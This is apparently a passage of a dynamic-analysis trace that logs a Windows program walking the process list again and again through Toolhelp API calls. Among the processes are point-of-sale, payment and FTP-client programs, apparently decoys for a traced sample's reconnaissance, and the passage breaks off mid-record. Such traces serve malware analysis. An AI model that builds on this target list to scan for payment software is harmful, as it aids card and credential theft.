[0183.065] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0183.069] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0183.073] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0183.076] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0183.084] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0183.088] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0183.091] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0183.100] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0183.103] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0183.105] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0183.108] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0183.110] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0183.113] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0183.116] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0183.118] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0183.120] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0183.123] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0183.126] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0183.133] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0183.136] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0183.139] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0183.141] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0183.144] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0183.146] Process32Next (in: hSnapshot=0x1230, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0183.148] CloseHandle (hObject=0x1230) returned 1 [0183.148] Sleep (dwMilliseconds=0x64) [0183.261] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x192c [0183.275] Process32First (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.277] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0183.278] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0183.281] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.282] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0183.284] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.287] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0183.289] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0183.291] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0183.293] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.295] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.297] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0183.356] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.358] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.360] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.362] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.364] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.367] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.369] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.370] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0183.372] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0183.374] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.376] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0183.378] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.380] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0183.382] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0183.385] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0183.390] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0183.392] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0183.449] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0183.451] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.452] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.454] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0183.456] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.457] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.459] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0183.461] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0183.463] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0183.465] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0183.467] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0183.469] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0183.470] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0183.472] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0183.474] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0183.476] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0183.478] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0183.480] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0183.482] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0183.517] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0183.520] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0183.522] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0183.524] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0183.526] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0183.528] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0183.530] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0183.531] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0183.533] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0183.535] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0183.538] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0183.540] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0183.542] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 